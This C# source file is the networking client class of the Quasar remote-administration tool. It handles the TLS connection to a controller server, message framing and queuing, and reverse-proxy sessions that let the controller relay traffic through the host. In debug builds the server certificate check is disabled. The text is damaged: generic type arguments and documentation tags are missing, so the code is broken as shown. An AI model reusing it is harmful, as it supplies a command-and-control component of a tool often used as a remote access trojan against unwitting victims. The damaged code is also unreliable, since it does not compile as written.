using Quasar.Client.ReverseProxy;
using Quasar.Common.Extensions;
using Quasar.Common.Messages;
using Quasar.Common.Messages.ReverseProxy;
using Quasar.Common.Networking;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Threading;
namespace Quasar.Client.Networking
{
public class Client : ISender
{
///
/// Occurs as a result of an unrecoverable issue with the client.
///
public event ClientFailEventHandler ClientFail;
///
/// Represents a method that will handle failure of the client.
///
/// The client that has failed.
/// The exception containing information about the cause of the client's failure.
public delegate void ClientFailEventHandler(Client s, Exception ex);
///
/// Fires an event that informs subscribers that the client has failed.
///
/// The exception containing information about the cause of the client's failure.
private void OnClientFail(Exception ex)
{
var handler = ClientFail;
handler?.Invoke(this, ex);
}
///
/// Occurs when the state of the client has changed.
///
public event ClientStateEventHandler ClientState;
///
/// Represents the method that will handle a change in the client's state
///
/// The client which changed its state.
/// The new connection state of the client.
public delegate void ClientStateEventHandler(Client s, bool connected);
///
/// Fires an event that informs subscribers that the state of the client has changed.
///
/// The new connection state of the client.
private void OnClientState(bool connected)
{
if (Connected == connected) return;
Connected = connected;
var handler = ClientState;
handler?.Invoke(this, connected);
}
///
/// Occurs when a message is received from the server.
///
public event ClientReadEventHandler ClientRead;
///
/// Represents a method that will handle a message from the server.
///
/// The client that has received the message.
/// The message that has been received by the server.
/// The length of the message.
public delegate void ClientReadEventHandler(Client s, IMessage message, int messageLength);
///
/// Fires an event that informs subscribers that a message has been received by the server.
///
/// The message that has been received by the server.
/// The length of the message.
private void OnClientRead(IMessage message, int messageLength)
{
var handler = ClientRead;
handler?.Invoke(this, message, messageLength);
}
///
/// Occurs when a message is sent by the client.
///
public event ClientWriteEventHandler ClientWrite;
///
/// Represents the method that will handle the sent message.
///
/// The client that has sent the message.
/// The message that has been sent by the client.
/// The length of the message.
public delegate void ClientWriteEventHandler(Client s, IMessage message, int messageLength);
///
/// Fires an event that informs subscribers that the client has sent a message.
///
/// The message that has been sent by the client.
/// The length of the message.
private void OnClientWrite(IMessage message, int messageLength)
{
var handler = ClientWrite;
handler?.Invoke(this, message, messageLength);
}
///
/// The type of the message received.
///
public enum ReceiveType
{
Header,
Payload
}
///
/// The buffer size for receiving data in bytes.
///
public int BUFFER_SIZE { get { return 1024 * 16; } } // 16KB
///
/// The keep-alive time in ms.
///
public uint KEEP_ALIVE_TIME { get { return 25000; } } // 25s
///
/// The keep-alive interval in ms.
///
public uint KEEP_ALIVE_INTERVAL { get { return 25000; } } // 25s
///
/// The header size in bytes.
///
public int HEADER_SIZE { get { return 4; } } // 4B
///
/// The maximum size of a message in bytes.
///
public int MAX_MESSAGE_SIZE { get { return (1024 * 1024) * 5; } } // 5MB
///
/// Returns an array containing all of the proxy clients of this client.
///
public ReverseProxyClient[] ProxyClients
{
get
{
lock (_proxyClientsLock)
{
return _proxyClients.ToArray();
}
}
}
///
/// Gets if the client is currently connected to a server.
///
public bool Connected { get; private set; }
///
/// The stream used for communication.
///
private SslStream _stream;
///
/// The server certificate.
///
private readonly X509Certificate2 _serverCertificate;
///
/// A list of all the connected proxy clients that this client holds.
///
private List _proxyClients = new List();
///
/// The internal index of the message type.
///
private int _typeIndex;
///
/// Lock object for the list of proxy clients.
///
private readonly object _proxyClientsLock = new object();
///
/// The buffer for incoming messages.
///
private byte[] _readBuffer;
///
/// The buffer for the client's incoming payload.
///
private byte[] _payloadBuffer;
///
/// The queue which holds messages to send.
///
private readonly Queue _sendBuffers = new Queue();
///
/// Determines if the client is currently sending messages.
///
private bool _sendingMessages;
///
/// Lock object for the sending messages boolean.
///
private readonly object _sendingMessagesLock = new object();
///
/// The queue which holds buffers to read.
///
private readonly Queue _readBuffers = new Queue();
///
/// Determines if the client is currently reading messages.
///
private bool _readingMessages;
///
/// Lock object for the reading messages boolean.
///
private readonly object _readingMessagesLock = new object();
// Receive info
private int _readOffset;
private int _writeOffset;
private int _readableDataLen;
private int _payloadLen;
private ReceiveType _receiveState = ReceiveType.Header;
///
/// The mutex prevents multiple simultaneous write operations on the .
///
private readonly Mutex _singleWriteMutex = new Mutex();
///
/// Constructor of the client, initializes serializer types.
///
/// The server certificate.
protected Client(X509Certificate2 serverCertificate)
{
_serverCertificate = serverCertificate;
_readBuffer = new byte[BUFFER_SIZE];
TypeRegistry.AddTypesToSerializer(typeof(IMessage), TypeRegistry.GetPacketTypes(typeof(IMessage)).ToArray());
}
///
/// Attempts to connect to the specified ip address on the specified port.
///
/// The ip address to connect to.
/// The port of the host.
protected void Connect(IPAddress ip, ushort port)
{
Socket handle = null;
try
{
Disconnect();
handle = new Socket(ip.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
handle.SetKeepAliveEx(KEEP_ALIVE_INTERVAL, KEEP_ALIVE_TIME);
handle.Connect(ip, port);
if (handle.Connected)
{
_stream = new SslStream(new NetworkStream(handle, true), false, ValidateServerCertificate);
_stream.AuthenticateAsClient(ip.ToString(), null, SslProtocols.Tls12, false);
_stream.BeginRead(_readBuffer, 0, _readBuffer.Length, AsyncReceive, null);
OnClientState(true);
}
else
{
handle.Dispose();
}
}
catch (Exception ex)
{
handle?.Dispose();
OnClientFail(ex);
}
}
///
/// Validates the server certificate by comparing it with the included server certificate.
///
/// The sender of the callback.
/// The server certificate to validate.
/// The X.509 chain.
/// The SSL policy errors.
/// Returns true when the validation was successful, otherwise false.
private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
// for debugging don't validate server certificate
return true;
#else
var serverCsp = (RSACryptoServiceProvider)_serverCertificate.PublicKey.Key;
var connectedCsp = (RSACryptoServiceProvider)new X509Certificate2(certificate).PublicKey.Key;
// compare the received server certificate with the included server certificate to validate we are connected to the correct server
return _serverCertificate.Equals(certificate);
#endif
}
private void AsyncReceive(IAsyncResult result)
{
int bytesTransferred;
try
{
bytesTransferred = _stream.EndRead(result);
if (bytesTransferred <= 0)
throw new Exception("no bytes transferred");
}
catch (NullReferenceException)
{
return;
}
catch (ObjectDisposedException)
{
return;
}
catch (Exception)
{
Disconnect();
return;
}
byte[] received = new byte[bytesTransferred];
try
{
Array.Copy(_readBuffer, received, received.Length);
}
catch (Exception ex)
{
OnClientFail(ex);
return;
}
lock (_readBuffers)
{
_readBuffers.Enqueue(received);
}
lock (_readingMessagesLock)
{
if (!_readingMessages)
{
_readingMessages = true;
ThreadPool.QueueUserWorkItem(AsyncReceive);
}
}
try
{
_stream.BeginRead(_readBuffer, 0, _readBuffer.Length, AsyncReceive, null);
}
catch (ObjectDisposedException)
{
}
catch (Exception ex)
{
OnClientFail(ex);
}
}
private void AsyncReceive(object state)
{
while (true)
{
byte[] readBuffer;
lock (_readBuffers)
{
if (_readBuffers.Count == 0)
{
lock (_readingMessagesLock)
{
_readingMessages = false;
}
return;
}
readBuffer = _readBuffers.Dequeue();
}
_readableDataLen += readBuffer.Length;
bool process = true;
while (process)
{
switch (_receiveState)
{
case ReceiveType.Header:
{
if (_payloadBuffer == null)
_payloadBuffer = new byte[HEADER_SIZE];
if (_readableDataLen + _writeOffset >= HEADER_SIZE)
{
// completely received header
int headerLength = HEADER_SIZE - _writeOffset;
try
{
Array.Copy(readBuffer, _readOffset, _payloadBuffer, _writeOffset, headerLength);
_payloadLen = BitConverter.ToInt32(_payloadBuffer, _readOffset);
if (_payloadLen <= 0 || _payloadLen > MAX_MESSAGE_SIZE)
throw new Exception("invalid header");
// try to re-use old payload buffers which fit
if (_payloadBuffer.Length <= _payloadLen + HEADER_SIZE)
Array.Resize(ref _payloadBuffer, _payloadLen + HEADER_SIZE);
}
catch (Exception)
{
process = false;
Disconnect();
break;
}
_readableDataLen -= headerLength;
_writeOffset += headerLength;
_readOffset += headerLength;
_receiveState = ReceiveType.Payload;
}
else // _readableDataLen + _writeOffset < HeaderSize
{
// received only a part of the header
try
{
Array.Copy(readBuffer, _readOffset, _payloadBuffer, _writeOffset, _readableDataLen);
}
catch (Exception)
{
process = false;
Disconnect();
break;
}
_readOffset += _readableDataLen;
_writeOffset += _readableDataLen;
process = false;
// nothing left to process
}
break;
}
case ReceiveType.Payload:
{
int length = (_writeOffset - HEADER_SIZE + _readableDataLen) >= _payloadLen
? _payloadLen - (_writeOffset - HEADER_SIZE)
: _readableDataLen;
try
{
Array.Copy(readBuffer, _readOffset, _payloadBuffer, _writeOffset, length);
}
catch (Exception)
{
process = false;
Disconnect();
break;
}
_writeOffset += length;
_readOffset += length;
_readableDataLen -= length;
if (_writeOffset - HEADER_SIZE == _payloadLen)
{
// completely received payload
try
{
using (PayloadReader pr = new PayloadReader(_payloadBuffer, _payloadLen + HEADER_SIZE, false))
{
IMessage message = pr.ReadMessage();
OnClientRead(message, _payloadBuffer.Length);
}
}
catch (Exception)
{
process = false;
Disconnect();
break;
}
_receiveState = ReceiveType.Header;
_payloadLen = 0;
_writeOffset = 0;
}
if (_readableDataLen == 0)
process = false;
break;
}
}
}
_readOffset = 0;
_readableDataLen = 0;
}
}
///
/// Sends a message to the connected server.
///
/// The type of the message.
/// The message to be sent.
public void Send(T message) where T : IMessage
{
if (!Connected || message == null) return;
lock (_sendBuffers)
{
_sendBuffers.Enqueue(message);
lock (_sendingMessagesLock)
{
if (_sendingMessages) return;
_sendingMessages = true;
ThreadPool.QueueUserWorkItem(ProcessSendBuffers);
}
}
}
///
/// Sends a message to the connected server.
/// Blocks the thread until the message has been sent.
///
/// The type of the message.
/// The message to be sent.
public void SendBlocking(T message) where T : IMessage
{
if (!Connected || message == null) return;
SafeSendMessage(message);
}
///
/// Safely sends a message and prevents multiple simultaneous
/// write operations on the .
///
/// The message to send.
private void SafeSendMessage(IMessage message)
{
try
{
_singleWriteMutex.WaitOne();
using (PayloadWriter pw = new PayloadWriter(_stream, true))
{
OnClientWrite(message, pw.WriteMessage(message));
}
}
catch (Exception)
{
Disconnect();
SendCleanup(true);
}
finally
{
_singleWriteMutex.ReleaseMutex();
}
}
private void ProcessSendBuffers(object state)
{
while (true)
{
if (!Connected)
{
SendCleanup(true);
return;
}
IMessage message;
lock (_sendBuffers)
{
if (_sendBuffers.Count == 0)
{
SendCleanup();
return;
}
message = _sendBuffers.Dequeue();
}
SafeSendMessage(message);
}
}
private void SendCleanup(bool clear = false)
{
lock (_sendingMessagesLock)
{
_sendingMessages = false;
}
if (!clear) return;
lock (_sendBuffers)
{
_sendBuffers.Clear();
}
}
///
/// Disconnect the client from the server, disconnect all proxies that
/// are held by this client, and dispose of other resources associated
/// with this client.
///
public void Disconnect()
{
if (_stream != null)
{
_stream.Close();
_readOffset = 0;
_writeOffset = 0;
_readableDataLen = 0;
_payloadLen = 0;
_payloadBuffer = null;
_receiveState = ReceiveType.Header;
//_singleWriteMutex.Dispose(); TODO: fix socket re-use by creating new client on disconnect
if (_proxyClients != null)
{
lock (_proxyClientsLock)
{
try
{
foreach (ReverseProxyClient proxy in _proxyClients)
proxy.Disconnect();
}
catch (Exception)
{
}
}
}
}
OnClientState(false);
}
public void ConnectReverseProxy(ReverseProxyConnect command)
{
lock (_proxyClientsLock)
{
_proxyClients.Add(new ReverseProxyClient(command, this));
}
}
public ReverseProxyClient GetReverseProxyByConnectionId(int connectionId)
{
lock (_proxyClientsLock)
{
return _proxyClients.FirstOrDefault(t => t.ConnectionId == connectionId);
}
}
public void RemoveProxyClient(int connectionId)
{
try
{
lock (_proxyClientsLock)
{
for (int i = 0; i < _proxyClients.Count; i++)
{
if (_proxyClients[i].ConnectionId == connectionId)
{
_proxyClients.RemoveAt(i);
break;
}
}
}
}
catch { }
}
}
}